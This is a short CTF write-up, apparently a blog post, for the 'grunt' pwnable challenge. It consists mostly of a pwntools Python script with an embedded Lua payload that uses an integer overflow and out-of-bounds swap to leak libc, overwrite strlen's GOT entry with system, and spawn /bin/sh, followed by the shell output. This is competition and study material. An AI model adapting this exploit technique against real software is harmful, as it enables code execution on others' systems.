Category : pwnable
Summary : lua script, oob, integer overflow
Exploit
#!/usr/bin/python
from pwn import *
import sys
s = process('./grunt')
ru = s.recvuntil
rl = s.recvline
rr = s.recv
rg = s.recvregex
sl = s.sendline
ss = s.send
script = '''
-- Lukachu
-- Hannobat
-- Andyball
-- Airmackly
function trigger(obj)
pokemon.swapAttack(obj, 0, 1) -- 1 2
pokemon.duplicateAttack(obj) -- 1 2 2
end
local strlen_got = 0x626070
for i=0,5 do
pokemon.new("dummy")
end
mon = pokemon.new("pwn3r")
target = pokemon.new("overwriteme")
pokemon.addAttack(mon, trigger)
pokemon.fight(mon, "Airmackly")
pokemon.doDamage(target, 0x100000064 - strlen_got)
pokemon.swapAttack(mon, 0x10, 0x12)
-- gdb-peda$ x/8wx 0x1981ed8
-- 0x1981ed8: 0x00000064 0x00000000 0x019825f0 0x00000000
leak = pokemon.getName(target) .. "\\x00\\x00"
libc_base = string.unpack("<I8", leak) - 0x8b720
libc_system = libc_base + 0x45390
pokemon.setName(target, string.pack("<I8", libc_system))
pokemon.setName(target, "/bin/sh;")
return libc_base
'''
s.send(script.ljust(0x1000, '\x00'))
s.interactive()
s.close()
$ python ex.py
[+] Starting local process './grunt': pid 8174
>>>
[*] Switching to interactive mode
pwn3r is stopped by a wild Airmackly!
Round 1
pwn3r hits Airmackly for 0 damage!
Airmackly uses TROUTSLAP!
Round 2
pwn3r hits Airmackly for 0 damage!
Airmackly uses INCAPACITATE!
Round 3
pwn3r hits Airmackly for 0 damage!
Airmackly uses INCAPACITATE!
The fight has ended
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)
'CTF > 2016' 카테고리의 다른 글
| 33C3 CTF - tea (0) | 2018.12.14 |
|---|---|
| 33C3 CTF - rec (0) | 2018.12.14 |
| 33C3 CTF - babyfengshui (0) | 2018.12.14 |
| SECCON CTF QUAL 2016 - jmper (1) | 2017.01.02 |
| SECCON CTF QUAL 2016 - checker (0) | 2017.01.02 |